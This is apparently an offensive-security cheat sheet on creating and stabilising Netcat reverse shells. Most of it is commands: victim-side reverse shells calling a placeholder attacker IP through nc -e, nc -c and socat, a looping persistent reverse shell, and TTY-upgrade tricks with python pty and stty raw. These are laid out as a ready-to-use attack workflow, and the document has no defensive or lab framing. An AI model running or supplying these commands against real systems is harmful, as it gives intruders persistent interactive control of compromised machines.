Netcat (nc) is a powerful tool often used for various networking tasks, including creating reverse shells. Stabilizing these shells is important for maintaining control and usability. Below are common techniques and commands to stabilize a Netcat reverse shell.
1. Basic Reverse Shell
# Attacker (listening)
nc -lvnp <port>
# Victim (reverse shell)
nc <attacker-ip> <port> -e /bin/bash
2. Stabilizing the Shell
2.1 Upgrading to a TTY Shell
# 1. After getting a reverse shell, upgrade to a TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 2. Press `Ctrl+Z` to background the shell
# 3. On the attacker's machine, adjust the terminal settings
stty raw -echo; fg
# 4. Reset the terminal to capture command history and auto-complete
export SHELL=bash
export TERM=xterm-256color
2.2 Using rlwrap
for Readline Support
# If you have `rlwrap` installed, you can use it to add readline support (history, editing)
rlwrap nc -lvnp <port>
2.3 Enabling Interactive Mode with -c
and -e
# Some versions of Netcat support the `-c` option for an interactive shell
nc -c bash <attacker-ip> <port>
2.4 Using Socat for a More Robust Shell
# 1. Start a listener with Socat on the attacker’s machine
socat file:`tty`,raw,echo=0 tcp-listen:<port>
# 2. Execute a reverse shell with Socat on the victim's machine
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker-ip>:<port>
2.5 Using SSH for Stabilization
# If SSH access is available, use it to stabilize the shell
ssh user@<attacker-ip> -p <port> -t bash
3. Additional Tips
3.1 Disable Terminal Echo
# If the terminal echoes your input twice, disable echo
stty -echo
3.2 Manage Terminal Size
# Adjust terminal size for better display
stty rows <num_rows> columns <num_columns>
3.3 Persistent Shell
# Use a while loop for a persistent reverse shell
while true; do nc -e /bin/bash <attacker-ip> <port>; done
4. Useful Aliases
# Simplify commands with aliases
alias ll='ls -la'
alias l='ls -l'
5. Quick Command Reference
# Spawn TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background the shell
Ctrl + Z
# Return to foreground after terminal adjustment
# Raw mode for interactive shells
stty raw -echo